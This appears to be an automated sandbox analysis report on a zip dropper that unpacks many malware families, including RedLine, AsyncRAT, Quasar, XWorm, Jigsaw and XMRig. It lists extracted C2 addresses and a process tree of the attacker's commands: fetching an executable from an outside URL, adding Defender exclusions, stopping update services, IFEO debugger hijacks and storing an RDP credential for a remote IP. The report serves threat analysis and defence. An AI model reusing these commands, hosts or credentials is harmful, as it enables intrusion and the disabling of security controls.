Analysis

  • max time kernel
    164s
  • max time network
    355s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13-11-2024 23:42

General

  • Target

    4363463463464363463463463.zip

  • Size

    4KB

  • MD5

    ef8cefd3add0abb43471ade5c7c0e5cb

  • SHA1

    37d88e8a6a8bff50c40dee86ffdf2963b85a6cb6

  • SHA256

    d9effa261325842f2c4a3eab4af0b32ef4184af057ab10a6f571756acca51258

  • SHA512

    9de9f6841b9cbbec637668708cf36b1a2ed59ad0ed364763b4b3f67d046b2057f084a9a0ded95d22677c9beec9b818d287c474c856af02b1a3e2a8eadf4d8c07

  • SSDEEP

    96:3Bf1inGx9SfZ+VCv3wlTDMQ1kyKXyyJNOBIKkNvL5qK+7zHf6MlYOQVPGmcEQ:3BfwncSf8Cv3w9DZjKXjmBIKEvLs97DX

Malware Config

Extracted

Family

redline

C2

185.215.113.9:12617

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

C2

91.92.240.41:7000

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    voldec.exe

Extracted

Family

redline

Botnet

newbundle2

C2

185.215.113.67:15206

Extracted

Family

quasar

Version

1.4.1

Botnet

Test

C2

193.161.193.99:35184

67.205.154.243:35184

Mutex

9cabbafb-503b-49f1-ab22-adc756455c10

Attributes
  • encryption_key

    8B93C77AC1C58EA80A3327E9FD26246A79EF3B8E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    MS Build Tools

  • subdirectory

    Microsoft-Build-Tools

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Detects ZharkBot payload 2 IoCs

    ZharkBot is a botnet written C++.

  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • Gh0strat family
  • Jigsaw Ransomware

    Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.

  • Jigsaw family
  • Modifies security service 2 TTPs 3 IoCs
  • Phorphiex family
  • Phorphiex payload 5 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Windows security bypass 2 TTPs 18 IoCs
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Zharkbot family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • Renames multiple (1000) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • XMRig Miner payload 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 6 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 48 IoCs
  • Loads dropped DLL 2 IoCs
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • VMProtect packed file 5 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Windows security modification 2 TTPs 21 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 52 IoCs
  • Launches sc.exe 22 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 3 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 11 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 57 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3352
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:5332
      • C:\Users\Admin\Desktop\4363463463464363463463463.exe
        "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Users\Admin\Desktop\Files\SharpHound.exe
          "C:\Users\Admin\Desktop\Files\SharpHound.exe"
          3⤵
          • Executes dropped EXE
          PID:3100
        • C:\Users\Admin\Desktop\Files\ASUFER.exe
          "C:\Users\Admin\Desktop\Files\ASUFER.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:5716
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\windows\ehome\SER.bat" "
            4⤵
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Suspicious use of WriteProcessMemory
            PID:3612
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im ipz.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4160
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im ipz2.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2252
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im nvidsrv.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2360
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im safesurf.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2328
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im surfguard.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4960
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1356
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5520
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f
              5⤵
                PID:1924
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f
                5⤵
                • System Location Discovery: System Language Discovery
                PID:580
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f
                5⤵
                  PID:2244
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f
                  5⤵
                    PID:2292
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2224
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2788
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:2556
                  • C:\Windows\SysWOW64\subin.exe
                    subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2108
                  • C:\Windows\SysWOW64\subin.exe
                    subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5504
                  • C:\Windows\SysWOW64\subin.exe
                    subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1428
                  • C:\windows\ehome\sc.exe
                    sc stop xStarter
                    5⤵
                    • Executes dropped EXE
                    • Launches sc.exe
                    • System Location Discovery: System Language Discovery
                    PID:5956
                  • C:\Windows\SysWOW64\subin.exe
                    subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1432
                  • C:\windows\ehome\wmild.exe
                    wmild.exe -c http://openslowmo.com/img/icons/SURFSET.exe --no-check-certificate
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:5484
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete HKLM\SOFTWARE\JetSwap /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:5748
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete HKCU\SOFTWARE\JetSwap /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:5928
                  • C:\Windows\SysWOW64\net.exe
                    net stop xStarter
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3592
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop xStarter
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:5776
                  • C:\Windows\SysWOW64\reg.exe
                    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
                    5⤵
                    • Event Triggered Execution: Image File Execution Options Injection
                    • System Location Discovery: System Language Discovery
                    PID:3064
                  • C:\Windows\SysWOW64\reg.exe
                    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
                    5⤵
                    • Event Triggered Execution: Image File Execution Options Injection
                    • System Location Discovery: System Language Discovery
                    PID:4640
                  • C:\Windows\SysWOW64\reg.exe
                    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
                    5⤵
                    • Event Triggered Execution: Image File Execution Options Injection
                    • System Location Discovery: System Language Discovery
                    PID:1252
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1424
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr" /v Start /t REG_DWORD /d "4" /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:5428
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im wuau𫲮exe /T
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3428
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im wuapp.exe /T
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:128
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im waagent.exe /T
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3964
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im wups.exe /T
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5832
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im wudriver.exe /T
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3636
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im stub.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4728
                  • C:\Windows\SysWOW64\net.exe
                    net stop xStarter
                    5⤵
                      PID:4476
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop xStarter
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2236
                    • C:\windows\ehome\sc.exe
                      sc stop xStarter
                      5⤵
                      • Executes dropped EXE
                      • Launches sc.exe
                      PID:5040
                • C:\Users\Admin\Desktop\Files\Statement-415322024.exe
                  "C:\Users\Admin\Desktop\Files\Statement-415322024.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4732
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 968
                    4⤵
                    • Program crash
                    PID:3508
                • C:\Users\Admin\Desktop\Files\ITplan.exe
                  "C:\Users\Admin\Desktop\Files\ITplan.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:5964
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76D.tmp\76E.tmp\76F.bat C:\Users\Admin\Desktop\Files\ITplan.exe"
                    4⤵
                      PID:4752
                      • C:\Windows\system32\cmdkey.exe
                        cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
                        5⤵
                          PID:3112
                        • C:\Windows\system32\mstsc.exe
                          mstsc /v: 211.168.94.177
                          5⤵
                          • Enumerates connected drives
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: AddClipboardFormatListener
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:4668
                    • C:\Users\Admin\Desktop\Files\Jigsaw.exe
                      "C:\Users\Admin\Desktop\Files\Jigsaw.exe"
                      3⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:1860
                      • C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
                        "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\Files\Jigsaw.exe
                        4⤵
                        • Deletes itself
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        PID:2848
                    • C:\Users\Admin\Desktop\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe
                      "C:\Users\Admin\Desktop\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetWindowsHookEx
                      PID:5436
                    • C:\Users\Admin\Desktop\Files\cookie250.exe
                      "C:\Users\Admin\Desktop\Files\cookie250.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Modifies system certificate store
                      PID:5728
                    • C:\Users\Admin\Desktop\Files\tt.exe
                      "C:\Users\Admin\Desktop\Files\tt.exe"
                      3⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:4316
                      • C:\Windows\sysmablsvr.exe
                        C:\Windows\sysmablsvr.exe
                        4⤵
                        • Modifies security service
                        • Windows security bypass
                        • Executes dropped EXE
                        • Windows security modification
                        PID:4884
                        • C:\Users\Admin\AppData\Local\Temp\337368602.exe
                          C:\Users\Admin\AppData\Local\Temp\337368602.exe
                          5⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4964
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                            6⤵
                              PID:2312
                              • C:\Windows\system32\reg.exe
                                reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                7⤵
                                  PID:568
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                6⤵
                                  PID:1720
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /delete /f /tn "Windows Upgrade Manager"
                                    7⤵
                                      PID:4888
                                • C:\Users\Admin\AppData\Local\Temp\1280732738.exe
                                  C:\Users\Admin\AppData\Local\Temp\1280732738.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:6012
                                • C:\Users\Admin\AppData\Local\Temp\3320025174.exe
                                  C:\Users\Admin\AppData\Local\Temp\3320025174.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5524
                                  • C:\Users\Admin\AppData\Local\Temp\3404819980.exe
                                    C:\Users\Admin\AppData\Local\Temp\3404819980.exe
                                    6⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Executes dropped EXE
                                    PID:1512
                            • C:\Users\Admin\Desktop\Files\njrat.exe
                              "C:\Users\Admin\Desktop\Files\njrat.exe"
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:580
                              • C:\Windows\rundll32.exe
                                "C:\Windows\rundll32.exe"
                                4⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops autorun.inf file
                                • Drops file in Windows directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: GetForegroundWindowSpam
                                PID:1240
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE
                                  5⤵
                                  • Modifies Windows Firewall
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:220
                            • C:\Users\Admin\Desktop\Files\11.exe
                              "C:\Users\Admin\Desktop\Files\11.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of SetWindowsHookEx
                              PID:4480
                              • C:\Windows\sysarddrvs.exe
                                C:\Windows\sysarddrvs.exe
                                4⤵
                                • Modifies security service
                                • Windows security bypass
                                • Executes dropped EXE
                                • Windows security modification
                                • Suspicious behavior: SetClipboardViewer
                                PID:4256
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5968
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1904
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                  5⤵
                                    PID:1028
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop UsoSvc
                                      6⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:5496
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop WaaSMedicSvc
                                      6⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2052
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop wuauserv
                                      6⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:5168
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop DoSvc
                                      6⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:6120
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop BITS
                                      6⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2964
                                  • C:\Users\Admin\AppData\Local\Temp\686511152.exe
                                    C:\Users\Admin\AppData\Local\Temp\686511152.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3660
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                      6⤵
                                        PID:3164
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                          7⤵
                                            PID:4896
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                          6⤵
                                            PID:5584
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /delete /f /tn "Windows Upgrade Manager"
                                              7⤵
                                                PID:5172
                                          • C:\Users\Admin\AppData\Local\Temp\241632213.exe
                                            C:\Users\Admin\AppData\Local\Temp\241632213.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2940
                                          • C:\Users\Admin\AppData\Local\Temp\881826859.exe
                                            C:\Users\Admin\AppData\Local\Temp\881826859.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:1256
                                      • C:\Users\Admin\Desktop\Files\softina.exe
                                        "C:\Users\Admin\Desktop\Files\softina.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5876
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • System Location Discovery: System Language Discovery
                                          PID:2360
                                        • C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe
                                          "C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3668
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"; Add-MpPreference -ExclusionProcess "JAVA_V3.exe"; exit"
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • System Location Discovery: System Language Discovery
                                            PID:5624
                                      • C:\Users\Admin\Desktop\Files\a.exe
                                        "C:\Users\Admin\Desktop\Files\a.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Drops file in Windows directory
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4596
                                        • C:\Windows\sysvplervcs.exe
                                          C:\Windows\sysvplervcs.exe
                                          4⤵
                                          • Modifies security service
                                          • Windows security bypass
                                          • Executes dropped EXE
                                          • Windows security modification
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: SetClipboardViewer
                                          PID:396
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                            5⤵
                                              PID:2500
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                PID:3456
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1504
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc stop UsoSvc
                                                6⤵
                                                • Launches sc.exe
                                                • System Location Discovery: System Language Discovery
                                                PID:4460
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc stop WaaSMedicSvc
                                                6⤵
                                                • Launches sc.exe
                                                • System Location Discovery: System Language Discovery
                                                PID:4468
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc stop wuauserv
                                                6⤵
                                                • Launches sc.exe
                                                • System Location Discovery: System Language Discovery
                                                PID:6028
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc stop DoSvc
                                                6⤵
                                                • Launches sc.exe
                                                • System Location Discovery: System Language Discovery
                                                PID:1064
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc stop BITS /wait
                                                6⤵
                                                • Launches sc.exe
                                                • System Location Discovery: System Language Discovery
                                                PID:2872
                                            • C:\Users\Admin\AppData\Local\Temp\1327623073.exe
                                              C:\Users\Admin\AppData\Local\Temp\1327623073.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:2400
